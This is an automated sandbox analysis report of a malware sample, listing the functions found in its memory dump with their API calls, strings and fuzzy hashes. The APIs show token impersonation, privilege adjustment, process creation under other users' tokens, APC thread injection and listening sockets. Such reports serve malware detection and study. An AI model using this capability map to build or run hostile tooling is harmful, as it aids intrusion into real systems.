_snprintf.LIBCMT ref: 03AA7D66
_snprintf.LIBCMT ref: 03AA7D83
_snprintf.LIBCMT ref: 03AA7CA5

Part of subcall function 03AAF63C: _errno.LIBCMT ref: 03AAF673
Part of subcall function 03AAF63C: _invalid_parameter_noinfo.LIBCMT ref: 03AAF67E

_snprintf.LIBCMT ref: 03AA7FD8
_snprintf.LIBCMT ref: 03AA8334

Strings

%s&%s, xrefs: 03AA826A
?%s=%s, xrefs: 03AA7D5A
%s%s, xrefs: 03AA80D7
%s%s, xrefs: 03AA7FC7, 03AA7FF1, 03AA8195, 03AA8326
%s%s: %s, xrefs: 03AA7C94
%s&%s=%s, xrefs: 03AA7D77
?%s, xrefs: 03AA8257

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
API String ID: 3442832105-1222817042
Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
Instruction ID: e0bb0dca58dbda2c7b561fe295eaf8f365359546539acd6c9d7f48ffa190061c
Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
Instruction Fuzzy Hash: BB32A7A7614F8592DB26DF6DE1012E9A3B0FF98759F045202DF8917B20EF39D2A6C740

Function 03AA1C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AA1C63

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

Part of subcall function 03A9D044: malloc.LIBCMT ref: 03A9D057

Part of subcall function 03A9D074: htonl.WS2_32 ref: 03A9D07F

GetCurrentDirectoryA.KERNEL32 ref: 03AA1CDB
FindFirstFileA.KERNEL32 ref: 03AA1D14
GetLastError.KERNEL32 ref: 03AA1D23
free.LIBCMT ref: 03AA1D5E
free.LIBCMT ref: 03AA1D6B

Part of subcall function 03AAF244: HeapFree.KERNEL32 ref: 03AAF25A
Part of subcall function 03AAF244: _errno.LIBCMT ref: 03AAF264
Part of subcall function 03AAF244: GetLastError.KERNEL32 ref: 03AAF26C

FileTimeToSystemTime.KERNEL32 ref: 03AA1D78
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 03AA1D89
FindNextFileA.KERNEL32 ref: 03AA1E46
FindClose.KERNEL32 ref: 03AA1E57

Strings

F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 03AA1E29
D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 03AA1DCB
%s, xrefs: 03AA1CF9
.\*, xrefs: 03AA1CBF

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 723279517-1754256099
Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
Instruction ID: 86a2138cae83dabd5ed131e69638f8a6b4cf16cf2c55e000bac64cbe3f76476a
Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
Instruction Fuzzy Hash: B651E276314B5186EB14DF66E8407AEB7A1F385B80F404017EE8A47B98EF7CC64ACB40

Function 03AA0F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32 ref: 03AA0F8F
GetLastError.KERNEL32 ref: 03AA0F9D
GetLastError.KERNEL32 ref: 03AA0FC1

Part of subcall function 03A9FE54: MultiByteToWideChar.KERNEL32 ref: 03A9FE81
Part of subcall function 03A9FE54: MultiByteToWideChar.KERNEL32 ref: 03A9FEA9

CreateProcessA.KERNEL32 ref: 03AA1013
GetLastError.KERNEL32 ref: 03AA101D
GetCurrentDirectoryW.KERNEL32 ref: 03AA1374
GetCurrentDirectoryW.KERNEL32 ref: 03AA1388
CreateProcessWithTokenW.ADVAPI32 ref: 03AA13D1

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
String ID:
API String ID: 3044875250-0
Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
Instruction ID: 2113e27f5db4c486e23e9516e443df703f3419d2bcbda5862aed3435470a30bf
Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
Instruction Fuzzy Hash: 05619873314F40D6EB21CF2AE88031E73A9F789B94F44552ADA8A87B14DF38C984CB01

Function 03AA9220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AA924F

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

_snprintf.LIBCMT ref: 03AA9267

Part of subcall function 03AAF63C: _errno.LIBCMT ref: 03AAF673
Part of subcall function 03AAF63C: _invalid_parameter_noinfo.LIBCMT ref: 03AAF67E

FindFirstFileA.KERNEL32 ref: 03AA9272
free.LIBCMT ref: 03AA927E

Part of subcall function 03AAF244: HeapFree.KERNEL32 ref: 03AAF25A
Part of subcall function 03AAF244: _errno.LIBCMT ref: 03AAF264
Part of subcall function 03AAF244: GetLastError.KERNEL32 ref: 03AAF26C

malloc.LIBCMT ref: 03AA92CE
_snprintf.LIBCMT ref: 03AA92E6
free.LIBCMT ref: 03AA930E
FindNextFileA.KERNEL32 ref: 03AA9327
FindClose.KERNEL32 ref: 03AA9338

Strings

%s\*, xrefs: 03AA9254

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
String ID: %s\*
API String ID: 2620626937-766152087
Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
Instruction ID: 539cd8ad2abbeadfb95fdd818e54e5f3cd223991f720ac488ebd67e3056e24fd
Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
Instruction Fuzzy Hash: 0D31E326314AC509DA1ADB676D103AABB65B74AFD0F88555ACEE50B794CF3CC143C314

Function 03AA3A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA3ACE
GetProcAddress.KERNEL32 ref: 03AA3ADE

Part of subcall function 03AA3984: malloc.LIBCMT ref: 03AA39C2
Part of subcall function 03AA3984: free.LIBCMT ref: 03AA3A45

CreateToolhelp32Snapshot.KERNEL32 ref: 03AA3B10
Thread32Next.KERNEL32 ref: 03AA3B7A
Sleep.KERNEL32 ref: 03AA3B90

Strings

ntdll, xrefs: 03AA3A99
NtQueueApcThread, xrefs: 03AA3AD4

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
String ID: NtQueueApcThread$ntdll
API String ID: 1427994231-1374908105
Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
Instruction ID: 710b6a4db9d58a7a3ab9fcfda3772905c06622aa730c6d445a0d4f4b52128272
Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
Instruction Fuzzy Hash: 1D41473B711F419AEF24CB6AA9403AD73A5BB48B88F58412ACE4D97B48EF38C145C740

Function 00401A70 Relevance: 12.0, APIs: 8, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00401A84
RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
RtlVirtualUnwind.KERNEL32 ref: 00401ADD
SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
GetCurrentProcess.KERNEL32 ref: 00401B34
TerminateProcess.KERNEL32 ref: 00401B42
abort.MSVCRT ref: 00401B48

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID:
API String ID: 4278921479-0
Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708

Function 03AA6A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 03AA6AB0
htons.WS2_32 ref: 03AA6AD0
ioctlsocket.WS2_32 ref: 03AA6AEC
closesocket.WS2_32 ref: 03AA6AFA
bind.WS2_32 ref: 03AA6B0D
listen.WS2_32 ref: 03AA6B1D

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 1767165869-0
Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
Instruction ID: a18ec48f5fa1154340ce529828ca1f14b35d9d5c21455d3bc5a55e7256b77fb5
Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
Instruction Fuzzy Hash: 8E11D336314B5482DB25CF1AE41031AB7B4F788FA4F4C5A2ADE9A47764CF3CD5458B01

Function 03AA6670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 03AA6698
htons.WS2_32 ref: 03AA66A4
socket.WS2_32 ref: 03AA66BC
closesocket.WS2_32 ref: 03AA66CE
bind.WS2_32 ref: 03AA66FB
ioctlsocket.WS2_32 ref: 03AA6715

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3910169428-0
Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
Instruction ID: 33686b602cf2452c72dc5e161c3ab006566e8330cb0261158e821abfbcce304a
Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
Instruction Fuzzy Hash: F8110336320F4487DB24DF25E81439A7760F789BA4F58562ACE69433A0DF3CC64ACB40

Function 03AADF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03AADCC0: RevertToSelf.ADVAPI32 ref: 03AADCDD

LogonUserA.ADVAPI32 ref: 03AADF98
GetLastError.KERNEL32 ref: 03AADFA2

Part of subcall function 03AA5FEC: malloc.LIBCMT ref: 03AA6008

Part of subcall function 03A9FE54: MultiByteToWideChar.KERNEL32 ref: 03A9FE81
Part of subcall function 03A9FE54: MultiByteToWideChar.KERNEL32 ref: 03A9FEA9

Part of subcall function 03A9D044: malloc.LIBCMT ref: 03A9D057

ImpersonateLoggedOnUser.ADVAPI32 ref: 03AADFC0
GetLastError.KERNEL32 ref: 03AADFCA

Strings

%s\%s, xrefs: 03AAE084

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
String ID: %s\%s
API String ID: 3621627092-4073750446
Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
Instruction ID: 249b7e642120d32235a51ce9478add5f16911182d660907bb1913c94878fbf7b
Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
Instruction Fuzzy Hash: 3C315C35314B4086FB02EB26F95075E37A9EB86B80F540027DA9E5BB65DF3CC645C701

Function 03A9FA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A9FA3D
Sleep.KERNEL32 ref: 03A9FAAC
GetTickCount.KERNEL32 ref: 03A9FAB2
Sleep.KERNEL32 ref: 03A9FACB
closesocket.WS2_32 ref: 03A9FAD4

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountSleepTick$closesocket
String ID:
API String ID: 2363407838-0
Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
Instruction ID: c2359761402e350dabc675c8397edf7a3eace114762d719fa541f50d59b97660
Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
Instruction Fuzzy Hash: 7611C626704B4445DE10E726F54021AA7A4B785BB0F4847239EBE5BBE4DF3CC6458B41

Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
GetCurrentProcessId.KERNEL32 ref: 004019E0
GetCurrentThreadId.KERNEL32 ref: 004019E8
GetTickCount.KERNEL32 ref: 004019F0
QueryPerformanceCounter.KERNEL32 ref: 004019FE

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708

Function 03AAEE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32 ref: 03AAEEC1
closesocket.WS2_32 ref: 03AAEED3
htons.WS2_32 ref: 03AAEEE4
bind.WS2_32 ref: 03AAEF05
listen.WS2_32 ref: 03AAEF1A

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonslistensocket
String ID:
API String ID: 564772725-0
Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
Instruction ID: 06130c1cdfb0ca0a4e36a23715e1ceb97aec2eaf6d3c8dacc2695522b3a1ecf3
Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
Instruction Fuzzy Hash: 3F110836714B5882EA20DF15E41471EB364F785FE0F485626EED947BA4DF3CC1058704

Function 03AA0B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32 ref: 03AA0BEA
AdjustTokenPrivileges.ADVAPI32 ref: 03AA0C1A
GetLastError.KERNEL32 ref: 03AA0C24

Strings

%s, xrefs: 03AA0C32

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID: %s
API String ID: 4244140340-620797490
Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
Instruction ID: 87e039fe5519fe09a0e9e27ac89a673cc23815fd1847e508a6792c75849a1c04
Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
Instruction Fuzzy Hash: D7214C72B10B409AEB14DF75D4487AD73B9F748B88F48485A8E8D97B48EF74C619C780

Function 03AA5854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA587B
Sleep.KERNEL32 ref: 03AA58CA
GetTickCount.KERNEL32 ref: 03AA58D0
WSAGetLastError.WS2_32 ref: 03AA58DA

Part of subcall function 03AA5A20: ioctlsocket.WS2_32 ref: 03AA5A42

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepioctlsocket
String ID:
API String ID: 1121440892-0
Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
Instruction ID: 600afdcc2c529e40b8b71b07c296b6ee6890565bbf7d28e8479a25e1d7c042ed
Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
Instruction Fuzzy Hash: 21316B36B00F40C6EB00DBA6E4842AC77B9F389B90F45462ACEAD977A4DF34C515C344

Function 03A9DA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03AA6114: htonl.WS2_32 ref: 03AA6131

GetLastError.KERNEL32 ref: 03A9DD33

Part of subcall function 03AACC00: GetCurrentProcess.KERNEL32 ref: 03AACC8D

HeapCreate.KERNEL32 ref: 03A9DCDA
HeapAlloc.KERNEL32 ref: 03A9DCF8

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
String ID:
API String ID: 3419463915-0
Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
Instruction ID: c389b8782b7120a76c90b36c92f842fc6227281f94e41bbd4ae2ccaf1ac08527
Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
Instruction Fuzzy Hash: 65E16FB7710B4187EF24CB29E94036A73A1F759754F48852ACB8AABB51EF3CE185C340

Function 03ABC3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

<, xrefs: 03ABCA6E
, xrefs: 03ABCA63

Memory Dump Source

